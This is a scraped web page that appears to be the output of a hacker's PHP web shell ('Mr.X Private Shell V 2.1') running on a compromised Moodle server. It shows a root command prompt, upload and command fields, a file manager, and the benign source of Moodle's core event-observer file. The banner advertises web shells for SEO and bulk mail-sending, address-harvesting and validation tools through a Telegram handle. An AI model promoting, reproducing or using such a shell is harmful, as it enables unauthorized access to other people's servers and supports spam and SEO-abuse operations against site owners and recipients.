__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.122: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Definition of core event observers.
 *
 * The observers defined in this file are notified when respective events are triggered. All plugins
 * support this.
 *
 * For more information, take a look to the documentation available:
 *     - Events API: {@link https://docs.moodle.org/dev/Events_API}
 *     - Upgrade API: {@link https://moodledev.io/docs/guides/upgrade}
 *
 * @package   core
 * @category  event
 * @copyright 2007 onwards Martin Dougiamas  http://dougiamas.com
 * @license   http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

defined('MOODLE_INTERNAL') || die();

// List of legacy event handlers.

$handlers = array(
    // No more old events!
);

// List of events_2 observers.

$observers = array(

    array(
        'eventname'   => '\core\event\course_module_completion_updated',
        'callback'    => 'core_badges_observer::course_module_criteria_review',
    ),
    array(
        'eventname'   => '\core\event\badge_awarded',
        'callback'    => 'core_badges_observer::badge_criteria_review',
    ),
    array(
        'eventname'   => '\core\event\course_completed',
        'callback'    => 'core_badges_observer::course_criteria_review',
    ),
    array(
        'eventname'   => '\core\event\user_updated',
        'callback'    => 'core_badges_observer::profile_criteria_review',
    ),
    array(
        'eventname'   => '\core\event\cohort_member_added',
        'callback'    => 'core_badges_observer::cohort_criteria_review',
    ),
    array(
        'eventname'   => '\core\event\competency_evidence_created',
        'callback'    => 'core_badges_observer::competency_criteria_review',
    ),
    // Competencies.
    array(
        'eventname'   => '\core\event\course_completed',
        'callback'    => 'core_competency\api::observe_course_completed',
    ),
    array(
        'eventname'   => '\core\event\course_module_completion_updated',
        'callback'    => 'core_competency\api::observe_course_module_completion_updated',
    ),
);

// List of all events triggered by Moodle can be found using Events list report.

Filemanager

Name Type Size Permission Actions
access.php File 76.81 KB 0644
analytics.php File 5.26 KB 0644
caches.php File 23.09 KB 0644
events.php File 2.72 KB 0644
hooks.php File 5.27 KB 0644
index.html File 1 B 0644
install.php File 14.94 KB 0644
install.xml File 381.56 KB 0644
legacyclasses.php File 11.33 KB 0644
log.php File 4.44 KB 0644
messageinbound_handlers.php File 1.03 KB 0644
messages.php File 8.29 KB 0644
renamedclasses.php File 2.44 KB 0644
services.php File 139.96 KB 0644
tag.php File 3.98 KB 0644
tasks.php File 12.15 KB 0644
upgrade.php File 61.01 KB 0644
upgradelib.php File 77.39 KB 0644
Filemanager